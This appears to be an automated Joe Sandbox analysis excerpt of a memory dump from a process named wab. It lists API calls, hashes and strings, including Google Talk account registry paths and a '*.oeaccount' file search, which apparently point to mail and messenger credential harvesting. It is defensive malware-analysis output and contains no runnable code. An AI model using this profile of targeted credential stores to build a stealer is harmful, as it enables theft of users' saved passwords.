                                                • API String ID: 3071782539-966475738
                                                • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                • String ID:
                                                • API String ID: 2054149589-0
                                                • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                  • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                  • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                • memset.MSVCRT ref: 00408620
                                                  • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                • memset.MSVCRT ref: 00408671
                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                Strings
                                                • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                • String ID: Software\Google\Google Talk\Accounts
                                                • API String ID: 1366857005-1079885057
                                                • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Cursor_mbsicmpqsort
                                                • String ID: /nosort$/sort
                                                • API String ID: 882979914-1578091866
                                                • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                  • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                • memset.MSVCRT ref: 00410E10
                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                • _mbscpy.MSVCRT ref: 00410E87
                                                  • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                Strings
                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                • API String ID: 889583718-2036018995
                                                • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Resource$FindLoadLockSizeof
                                                • String ID:
                                                • API String ID: 3473537107-0
                                                • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 004109F7
                                                  • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                  • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                • memset.MSVCRT ref: 00410A32
                                                • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                • String ID:
                                                • API String ID: 3143880245-0
                                                • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??2@
                                                • String ID:
                                                • API String ID: 1033339047-0
                                                • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@mallocmemcpy
                                                • String ID:
                                                • API String ID: 3831604043-0
                                                • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                  • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                                • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: CreateFontIndirect_mbscpymemset
                                                • String ID: Arial
                                                • API String ID: 3853255127-493054409
                                                • Opcode ID: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                                • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                • Opcode Fuzzy Hash: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                                • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                • _strcmpi.MSVCRT ref: 0040CEC3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: strlen$_strcmpimemset
                                                • String ID: /stext
                                                • API String ID: 520177685-3817206916
                                                • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Library$AddressFreeLoadProc
                                                • String ID:
                                                • API String ID: 145871493-0
                                                • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                  • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                  • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                  • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: PrivateProfile$StringWrite_itoamemset
                                                • String ID:
                                                • API String ID: 4165544737-0
                                                • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: EnumNamesResource
                                                • String ID:
                                                • API String ID: 3334572018-0
                                                • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: CloseFind
                                                • String ID:
                                                • API String ID: 1863332320-0
                                                • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Open
                                                • String ID:
                                                • API String ID: 71445658-0
                                                • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                • LoadCursorA.USER32(00000067), ref: 0040115F
                                                • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                • EndDialog.USER32(?,00000001), ref: 0040121A
                                                • DeleteObject.GDI32(?), ref: 00401226
                                                • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                • ShowWindow.USER32(00000000), ref: 00401253
                                                • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                • ShowWindow.USER32(00000000), ref: 00401262
                                                • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                • memset.MSVCRT ref: 0040128E
                                                • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                • String ID:
                                                • API String ID: 2998058495-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • wcslen.MSVCRT ref: 0044406C
                                                • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                                • strlen.MSVCRT ref: 004440D1
                                                  • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                                                  • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                                • memcpy.MSVCRT ref: 004440EB
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                • String ID:
                                                • API String ID: 577244452-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadMenuA.USER32(00000000), ref: 00409078
                                                • sprintf.MSVCRT ref: 0040909B
                                                  • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                  • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                  • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                  • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                  • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
